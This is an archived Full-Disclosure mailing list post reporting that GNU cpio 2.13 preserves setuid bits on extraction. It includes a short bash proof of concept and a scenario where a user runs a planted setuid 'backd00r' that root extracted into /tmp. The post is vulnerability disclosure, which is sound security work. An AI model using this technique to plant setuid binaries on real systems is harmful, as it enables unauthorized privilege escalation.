| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAGUWgD9riQmTGxPuecEC+9Owsn3cZK+n0mVy+wLC5rzrZx6y=g@mail.gmail.com> Date: Mon, 8 Jan 2024 11:25:34 +0200 From: Georgi Guninski <gguninski@...il.com> To: fulldisclosure@...lists.org Subject: [FD] cpio privilege escalation vulnerability via setuid files in cpio archive cpio privilege escalation vulnerability via setuid files in cpio archive Happy New Year, let in 2024 happiness be with you! :) When extracting archives cpio (at least version 2.13) preserves the setuid flag, which might lead to privilege escalation. One example is r00t extracts to /tmp/ and scidiot runs /tmp/micq/backd00r without further interaction from root. We believe this is vulnerability, since directory traversal in cpio is considered vulnerability. The POC is trivial, including bash script. <pre> ==== #!/bin/bash # cpio privilege escalation via setuid files in cpio archive # author: Georgi Guninski # date: Mon Jan 8 07:28:28 AM UTC 2024 # tested on cpio (GNU cpio) 2.13 mkdir -p /tmp/1 cd /tmp/1 touch a chmod 4555 a echo -n a | cpio -ocv0 > a.cpio mkdir -p /tmp/2 cd /tmp/2 cpio -iv < ../1/a.cpio ls -lh /tmp/2/a #-r-sr-xr-x. 1 joro joro 0 Jan 8 09:10 /tmp/2/a ==== </pre> _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists